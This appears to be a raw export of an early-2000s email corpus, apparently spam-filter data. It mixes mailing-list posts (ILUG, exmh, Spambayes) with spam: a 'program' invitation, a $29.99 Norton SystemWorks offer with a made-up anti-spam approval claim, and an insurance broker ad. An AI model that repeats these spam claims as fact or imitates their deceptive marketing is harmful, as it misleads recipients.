 Please click on the link to my web page and take just a few minutes to read 
 over the material inside. It is a really fascinating program and I am very 
 excited about its potential and I hope you will be to after you read about 
 it.
 CLICK HERE FOR DETAILS http://thelastprogram2001.50megs.com
 If you have any questions or concerns please feel free to call me at 702 604 
 6163
 Warmest regards
 Rick
 Do not reply to this message - 
 To be removed from future mailings:
 mailto:grantuit2001@yahoo.com?Subject=Remove
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] slashdot EW Dijkstra humor
</t>
  </si>
  <si>
    <t xml:space="preserve">Thought this was funny.
 In the slashdot thread about
 EW Dijkstra passing away on
 tuesday, there was:
 GOTO Heaven
        Re:GOTO Heaven
        I'll bet he gets there by the shortest path.
 Referring to his "Goto considered harmful" etc.
 Sad to see these people go. 3 others I've
 noticed lately were: Richard Stevens, Jim Ellis
 and Jon Postel.
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] OSI protocol
</t>
  </si>
  <si>
    <t xml:space="preserve">There's been some discussion just now on the ILUG IRC channel about OSI and
 protocol layers. This reminded me of a poster produced by Wandel &amp;
 Goltermann (manufactureres of fine protocol decoders and testers) which
 illustrates this admirably. The poster is in the form of a PDF file and to
 be honest, is best appreciated if you have access to a HP DesignJet or
 somesuch device. Wandel &amp; Goltermann has now become/been taken over by
 acterna and I couldn't find the poster there. However, it's available at
 http://www.pb.bib.de/~dozloh/fachinfo/sdn_16/decodes.pdf and some of you ma
 find it interesting.
 The top of the poster refers you to www.decodes.com for a more up to date
 online copy of the poster. However, www.decodes.com now is redirected to the
 aforementioned acterna and . . . .
 Niall
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: SYSTEMWORKS CLEARANCE SALE_LIMITED QUANTITIES_ONLY $29.99 TJ
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 4.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;Norton AD&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"0" width=3D"489" height=3D"54" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width=3D"100%" height=3D"48" bgcolor=3D"#FFFFFF" align=3D"center"&gt;=
 &lt;font face=3D"Impact" color=3D"#CC0000" size=3D"3"&gt;Take
       Control of Your Computer With This Top-of-the-Line Software!&lt;/font&gt;&lt;=
 /td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"5" cellspacing=3D"3" width=3D"489" cellpadding=3D"3" bgco=
 lor=3D"#990033"  bordercolor=3D"#FFFFFF" style=3D"border-collapse: collaps=
 e" bordercolordark=3D"#000000" height=3D"567" bordercolorlight=3D"#FFFF99"=
 &gt;
   &lt;tr&gt;
     &lt;td width=3D"467" height=3D"555" bordercolorlight=3D"#FFFFFF" borderco=
 lordark=3D"#FFFF99"&gt;
       &lt;table border=3D"6" width=3D"100%" height=3D"86" bgcolor=3D"#FFFF99"=
  bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"80" align=3D"center"&gt;&lt;b&gt;&lt;font color=
 =3D"#FF0000" face=3D"Tahoma" size=3D"6"&gt;Norton
             SystemWorks 2002 &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"5" color=
 =3D"#000000"&gt; Software Suite&lt;/font&gt;&lt;font color=3D"#FF0000" face=3D"Times N=
 ew Roman" size=3D"6"&gt;&lt;br&gt;
             -&lt;i&gt;Professional Edition&lt;/i&gt;-&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"62"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"56" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D=
 "Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;Includes
             Six - &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFF=
 F99"&gt;Yes 6!&lt;/font&gt;&lt;/i&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt; 
             - Feature-Packed Utilities&lt;br&gt;ALL for &lt;/font&gt;&lt;font face=3D"Tah=
 oma" size=3D"4" color=3D"#FFFF99"&gt;1&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#=
 FFFFFF" size=3D"4"&gt;
             Special &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF=
 99"&gt;LOW&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Price of &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFF=
 F99"&gt;Only
             $29.99!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"4" width=3D"100%" height=3D"135" bgcolor=3D"#800000=
 " bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"129" bgcolor=3D"#FFFF99" bordercolo=
 r=3D"#800000"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D"2"&gt;&lt;font color=3D"#000000"&gt;=
 This
             Software Will:&lt;/font&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;br&gt;&amp;nbsp;&lt;/font&gt;=
 &lt;font color=3D"#FF0000"&gt;-
             Protect your computer from unwanted and &lt;i&gt; hazardous&lt;/i&gt;  vir=
 uses&lt;br&gt;&amp;nbsp;-
             Help secure your private &amp;amp; valuable information&lt;br&gt;&amp;nbsp;-=
  Allow
             you to transfer files and send e-mails &lt;u&gt; safely&lt;/u&gt;&lt;br&gt;&amp;nbsp=
 ;-
             Backup your ALL your data quick and easily&lt;br&gt;&amp;nbsp;- Improve =
 your
             PC's performance w/&lt;i&gt;superior&lt;/i&gt;
             integral diagnostics!&lt;br&gt;&amp;nbsp;- &lt;i&gt;You'll NEVER have to take =
 your
             PC to the repair shop AGAIN!&lt;/i&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&amp;nbsp;
       &lt;table border=3D"4" width=3D"100%" height=3D"4" bgcolor=3D"#FFFFFF" =
 bordercolor=3D"#FFFF99"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"1"&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"5" face=3D"Tahoma"&gt;&lt;font =
 color=3D"#000000"&gt;&lt;font color=3D"#ff0000"&gt;6&lt;/font&gt;
             Feature-Packed Utilities
             &lt;/font&gt;&lt;font color=3D"#000080" size=3D"5"&gt;&lt;br&gt;&lt;/font&gt;&lt;u&gt;&lt;font =
 color=3D"#ff0000"&gt;1&lt;/font&gt;&lt;font color=3D"#000000"&gt;
             Great Price&lt;/font&gt;&lt;/u&gt;&lt;font color=3D"#000000" size=3D"5"&gt; &lt;br&gt;
             A &lt;font color=3D"#ff0000"&gt;$300+&lt;/font&gt;  
             Combined Retail Value
             &lt;/font&gt;
             &lt;i&gt;&lt;font color=3D"#FF0000"&gt;YOURS&lt;/font&gt;&lt;/i&gt; &lt;font color=3D"#00=
 0000"&gt; for
             Only &lt;font color=3D"#ff0000"&gt;$29.99!&lt;/font&gt;
             &lt;/font&gt;&lt;/font&gt;&lt;font size=3D"6"&gt;&lt;br&gt;
             &lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Tahoma" size=3D"4"&gt;&lt;font color=3D"#00=
 0000"&gt;&amp;lt;
             Price Includes &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;FREE&lt;/font&gt;&lt;font=
  color=3D"#000080"&gt; 
             &lt;/font&gt;&lt;font color=3D"#000000"&gt;Shipping! &amp;gt;&lt;br&gt;&lt;/font&gt;&lt;/font=
 &gt;&lt;font color=3D"#FF0000" size=3D"3" face=3D"Impact"&gt;And
             For a Limited time Buy Any 2 of Our Products &amp;amp; Get 1 Free!=
 &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;p align=3D"Center"&gt;&lt;b&gt; &lt;font face=3D"Arial" size=3D"3" color=3D"#FFFF=
 FF"&gt;Don't fall
     prey to destructive viruses or hackers!&lt;br&gt;Protect&amp;nbsp; your computer=
  and
     your valuable information and&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;table border=3D"4" width=3D"100%" height=3D"44" bordercolor=3D"#FFF=
 F99" bgcolor=3D"#FFFF99"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"38" bgcolor=3D"#FFFFFF" align=3D"ce=
 nter"&gt;&lt;b&gt;&lt;a href=3D"http://www.anythinggoeshere.com/" style=3D"color: #FF0=
 000; font-family: Verdana; font-size: 14pt; font-weight: bold"&gt;&lt;font face=3D=
 "Tahoma" size=3D"4" color=3D"#FF0000"&gt;-&amp;gt;
             CLICK HERE to Order Yours NOW! &amp;lt;-&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"Center"&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D"#FFFF=
 99"&gt;&lt;b&gt;or Call
       Toll-Free 1-800-861-1481!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p align=3D"Center"&gt;&lt;font color=3D"#ffffff" size=3D"1" face=3D"Tahom=
 a"&gt;Your email
       address was obtained from an opt-in list. Opt-in UEFAS (United Email
       Federation Against Spam) Approved List - &amp;nbsp;Purchase Code #
       8594030.&amp;nbsp;&amp;nbsp;If you wish to be unsubscribed from this list, p=
 lease &lt;a style=3D"COLOR: #ffffcc" href=3D"http://www.anythinggoeshere.com/=
 remove.asp"&gt;Click
       here&lt;/a&gt; . If you have previously unsubscribed and are still receivi=
 ng
       this message, you may email our &lt;a style=3D"COLOR: #ffffcc" href=3D"=
 http://www.anythinggoeshere.com/abuse.asp"&gt;Spam
       Abuse Control Center&lt;/a&gt;. We do not condone spam in any shape or for=
 m.
       Thank You kindly for your cooperation.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Physics auction nets half-mil for Einstein
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534316
 Date: Not supplied
 Last Friday's Christie's auction of original physics manuscripts included 
 original works by Einstein, Curie, Newton and other physics rock-stars. The 
 Einstein (which included an early attempt to prove relativity) went to an 
 anonymous bidder for $500,000. Link[1] Discuss[2]
 [1] http://www.sciam.com/article.cfm?chanID=sa003&amp;articleID=0007B1D4-EC91-1D9D-815A809EC5880000
 [2] http://www.quicktopic.com/boing/H/uiCM4MRSGBDC
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 4 Sep 2002, Mr. FoRK wrote:
 --]It'd be an MP3 player with solid state storage... instant on.
 Getting new media on is a bit out of the reach of the kindala. With a CD
 solution you hand em a disc and in it goes.
 Tradeoffs abound.
 Heather got a CD player when she was 5. Even though it was a crappy
 handmedown it worked great other than the batterys poping out..bad bad ui
 there. Her next one was a store bought.  Its an all Audio player, no mp3
 decoders for her yet. I wanted to do the bottom line Volt but momala put
 the kabash on anything costing over 30 bucks. heck I had to scrounge ebay
 to get her a palm m100 for about 25 bucks.
 The only hitch is new music. Upshot is we spend time going over usenet
 listing togther:)-
 Its a happy family.
 Now for Benjamin, yea id love to have something like the amazingly cool
 Fisher Price My First (cd, casset, vasectomy, dirtybomb) products. Perhaps
 the My First Cd might work...time to let ebay do the walking.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Impaired Risk Case of the Month
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_4098D_01C25F36.D7652D00
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  Diversified Underwriters Services, Inc.
  Impaired Risk Case of the Month August 2002
  Male 64 Non-smoker
  Face Amount $6,000,000
  History of Arterial Sclerotic Heart Disease
  Coronary Artery Disease
  Abnormal Echocardiogram
  Increasing Abnormal PSA
  Currently on Chelation Therapy
  Competition Rated Table 4=20
  Diversified's Answer...
  Preferred!
 Broker's Commission: $69,576 !!
  =09
 Let Us Turn Your Clients That Have Been Declined, Rated or Have Current
 Health Problems, Into Placeable Life Cases!
   =09
  "INST-A-QUOTE"(tm) for Impaired Risk Life Quotes
  Call Now for an "Inst-A-Quote"=99 on your client and we will get back =
 to
 you within 24 hours! 800-683-3077 ext. 0=97 or =97
 Please fill out the form below for more information	=20
 Name:	 	  =09
 E-mail:	 	=20
 Phone:	 	=20
 City:	 	 State:	 	=20
  	    =09
 =20
  &lt;http://www.d-u-s.com&gt; 	=20
 For Broker Use Only. Not for Public Dissemination.	=20
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insuranceiq.com/optout
 &lt;http://www.Insuranceiq.com/optout&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_4098D_01C25F36.D7652D00
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Impaired Risk Case of the Month&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Dwindows-1252"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;&lt;img src=3D"http://iiq.us/Images/dus/0801/20020830-101aug.gif" =
 alt=3D"Diversified Underwriters Services, Inc." width=3D"550" =
 height=3D"77"&gt;&lt;br&gt;=20
       &lt;img src=3D"http://iiq.us/Images/dus/0801/20020830-102aug.gif" =
 alt=3D"Impaired Risk Case of the Month" width=3D"275" height=3D"91"&gt;&lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020830-103aug.jpg" alt=3D"August =
 2002" width=3D"275" height=3D"91"&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td valign=3D"top"&gt;
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;
                 &lt;td&gt;=20
                   &lt;font size=3D"4"&gt;=20
                   &lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020731-98.gif" width=3D"12" =
 height=3D"21" align=3D"texttop"&gt;Male 64 Non-smoker&lt;br&gt;
                   &lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020731-98.gif" width=3D"12" =
 height=3D"21" align=3D"texttop"&gt;Face Amount $6,000,000&lt;br&gt;
                   &lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020731-98.gif" width=3D"12" =
 height=3D"21" align=3D"texttop"&gt;History of Arterial Sclerotic Heart =
 Disease&lt;br&gt;
                   &lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020731-98.gif" width=3D"12" =
 height=3D"21" align=3D"texttop"&gt;Coronary Artery Disease&lt;br&gt;
                   &lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020731-98.gif" width=3D"12" =
 height=3D"21" align=3D"texttop"&gt;Abnormal Echocardiogram&lt;br&gt;
                   &lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020731-98.gif" width=3D"12" =
 height=3D"21" align=3D"texttop"&gt;Increasing Abnormal PSA&lt;br&gt;
                   &lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020731-98.gif" width=3D"12" =
 height=3D"21" align=3D"texttop"&gt;Currently on Chelation Therapy&lt;br&gt;
                   &lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020731-98.gif" width=3D"12" =
 height=3D"21" align=3D"texttop"&gt;Competition Rated Table 4=20
                   &lt;p align=3D"center"&gt;&lt;img height=3D"36" =
 src=3D"http://iiq.us/Images/dus/0801/20020830-201.gif" width=3D"298" =
 alt=3D"Diversified's Answer..."&gt;&lt;br&gt;
                     &lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020830-202.gif" alt=3D"Standard!" =
 width=3D"298" height=3D"42" alt=3D'Preferred!'&gt;&lt;br&gt;&lt;br&gt;
                     &lt;i&gt;&lt;b&gt;Broker's Commission: $69,576 !!&lt;/b&gt;&lt;/i&gt;&lt;/p&gt;
                   &lt;/font&gt;=20
                 &lt;/td&gt;
                 &lt;td align=3D"right" valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020731-3.jpg" width=3D"169" =
 height=3D"250"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;b&gt;&lt;font color=3D"#000000"&gt;Let Us Turn Your Clients That =
 Have Been=20
             &lt;font color=3D"#0000FF"&gt;Declined, Rated&lt;/font&gt; or Have =
 Current=20
             &lt;font color=3D"#0000FF"&gt;Health Problems&lt;/font&gt;, Into &lt;font =
 color=3D"#0000FF"&gt;Placeable=20
             Life Cases!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
             &amp;nbsp;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font size=3D"2"&gt;&lt;b&gt;&lt;img =
 src=3D"http://iiq.us/Images/dus/0801/instaquote01.gif" =
 alt=3D"&amp;quot;INST-A-QUOTE&amp;quot;(tm)  for Impaired Risk Life Quotes" =
 width=3D"408" height=3D"75"&gt;&lt;br&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif"&gt;=20
             &lt;img src=3D"http://iiq.us/Images/dus/0801/20020731-7.gif" =
 width=3D"321" height=3D"45" alt=3D"Call Now for an =
 &amp;quot;Inst-A-Quote&amp;quot;&amp;#8482; on your  client and we will get back to =
 you within 24 hours!"&gt;=20
             &lt;img src=3D"http://iiq.us/Images/dus/0801/20020830-5.gif" =
 alt=3D"800-683-3077 ext. 0" width=3D"540" height=3D"94"&gt;=20
             &amp;#8212; or &amp;#8212;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#cccccc"&gt;
                       &lt;tr bgcolor=3D"#000066"&gt;=20
                         &lt;td colspan=3D"5" align=3D"center"&gt;&lt;font =
 color=3D"#FFFFFF" size=3D"2"&gt;&lt;b&gt;Please fill out the form below for more =
 information&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;&lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 size=3D"2"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;&lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"rblanco@d-u-s.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"DUS Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;a href=3D"http://www.d-u-s.com"&gt;&lt;img =
 src=3D"http://iiq.us/Images/dus/0801/20020830-6.gif" width=3D"485" =
 height=3D"40" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;font size=3D"1"&gt;For Broker Use Only. Not for Public =
 Dissemination.&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt; &lt;p&gt;&lt;font =
 size=3D"1"&gt; We don't=20
         want anyone to receive our mailings who does not wish to. This =
 is professional=20
         communication sent to insurance professionals. To be removed =
 from this=20
         mailing list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go =
 here: &lt;a href=3D"http://www.Insuranceiq.com/optout"&gt;=20
         http://www.Insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_4098D_01C25F36.D7652D00--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hoax!
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572779,215/
 Date: 2002-10-05T03:05:36+01:00
 When a Florida journalist was killed by anthrax sent to him by letter, it set 
 off a wave of copycat hoaxers. *Jon Ronson* tracks them down.Quizzes[1]| 
 Crossword[2]| Interactive guides[3]| Steve Bell[4]| Weblog[5]*Other news 
 and comment**Home Office set to rewrite Geneva refugee agreement*[6]
 [1] http://www.newsisfree.com/quiz/0,7476,349695,00.html
 [2] http://www.newsisfree.com/crossword/0,4406,180778,00.html
 [3] http://www.newsisfree.com/interactive/0,2759,192055,00.html
 [4] http://www.newsisfree.com/cartoons/0,7371,337484,00.html
 [5] http://www.newsisfree.com/weblog/0,6798,517233,00.html
 [6] http://www.newsisfree.com/Refugees_in_Britain/Story/0,2763,805011,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: On Windley's Radar Too
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000220.html
 Date: 2002-10-03T00:24:56-08:00
 Last week, I noticed that I was on Dave's radar. Now that I've caught up on 
 blogging, it seems that I'm on Windley's radar too. He picked up on my 
 FreeBSD/Linux MySQL story and that provoked an interesting discussion of...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Help! I've lost my exmh-unseen window!
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 In article &lt;E17v8Mw-0004eS-00@pmenage-dt.ensim.com&gt; you write:
 &gt;&gt;
 &gt;&gt;	I'll have to try it with another window manager and see if I can
 &gt;&gt;get exmh to put it back inside of sane boundaries. I don't have this
 &gt;&gt;problem with any other windows, though. Just the exmhunseen window.
 &gt;&gt;
 &gt;
 &gt;How about enabling the "Show unseen message count in folder cache"
 &gt;option? It displays the number of unseen messages next to each folder name
 &gt;(if greater than 0), so you don't really need the unseen window unless
 &gt;you're using more sequences than just "unseen".
 &gt;
 &gt;Paul
 &gt;
 	As Hal noted, I like to have the unseen window visible in all
 virtual desktops, even if the main window is minimized. However, I looked
 through ALL the preferences menus, and didn't see anything resembling "Show
 unseen message count in folder cache". Where is that? And in what version?
 (I'm running v2.4 - 06/23/2000 - Creaky, I know.)
 	I went into twm with no virtual desktops, and it came up just fine.
 Going back to Enlightenment I saw the same behavior as before. Then I knew
 it MUST be something in the window manager, so I went digging. in my 
 ~/.englightenment/...e_session-XXXXXX.snapshots.0 file I found all the
 settings that E. uses for remembering border styles, positions, shaded
 state, etc. 
 	I have a 1600x1200 screen, and it kept putting my window at
 1655x150 (AND had it shaded to boot, so it was tiny as well as offscreen!)
 	Searching for 'unseen' in that file found this section:
 NEW: exmh.Exmh
 NAME: exmh
 CLASS: Exmh
 NEW: unseen.UnseenWin
 NAME: unseen
 CLASS: UnseenWin
 DESKTOP: 0
 RES: 1600 1200
 WH: 114 173
 XY: 1655 150 0 0
 LAYER: 4
 STICKY: 1
 SKIPTASK: 0
 SKIPWINLIST: 0
 SKIPFOCUS: 0
 SHADE: 2
 BORDER: PAGER_LEFT_BLUE
 	I changed:
 XY: 1655 150 0 0  	to 
 XY: 1455 150 0 0	so it would reappear in my viewable space,
 restarted Enlightenment (CTRL-ALT-End) and then restarted exmh. Bingo!
 There was my window! 
 	I quickly told Englightenment to forget everything about that
 window except is border style, and now have a sveldt little entry like so:
 NEW: exmh.Exmh
 NAME: exmh
 CLASS: Exmh
 NEW: unseen.UnseenWin
 NAME: unseen
 CLASS: UnseenWin
 BORDER: PAGER_LEFT_BLUE
 	Completely an Enlightenment problem, not exmh. (Though I wonder how
 it got mixed up in the first place? I certainly can't move a window off
 screen like that. Unless it was part way over then snapped offscreen when
 shading.)
 	Hmm. Weird. 
 	Anyway, thanks for the suggestions, folks. Hopefully this will be
 useful to someone scouting the archives in the future... :-) 
 -----BEGIN PGP SIGNATURE-----
 Version: PGP 6.5.2
 Comment: Don't know what PGP is? Check http://www.pgpi.org/
 iQA/AwUBPZayRIJkhJBJYtPQEQIyzgCg/mMMlKnmP8Cxa/h7b5X0KrJXsLsAoO1N
 6dm1Hpj6RnUGPjuUQItBYEC3
 =OL5H
 -----END PGP SIGNATURE-----
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Barclay twins buy Littlewoods
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8572783,215/
 Date: 2002-10-05T03:05:36+01:00
 *Business:* Billionaire brothers add store to empire for 750m.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] Maybe change X-Spam-Disposition to something else... 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt; Skip Montanaro wrote
 &gt; 
 &gt; I actually like Neale's X-Spam-Disposition header, I just wonder if maybe we
 &gt; should choose something with a different prefix than "X-Spam-" so that
 &gt; people don't confuse it with SpamAssassin, all of whose headers begin with
 &gt; that prefix.
 I think it's fine, in general, just so long as no-one checks in anything
 that puts it into my test corpus.
 Or alternately, whatever is chosen should be ignored by the tokenizer. 
 I know my mail host (interlink) runs SA, but I also run it, with my own
 set of rules and scores. I don't want my spam-filter to be getting messed
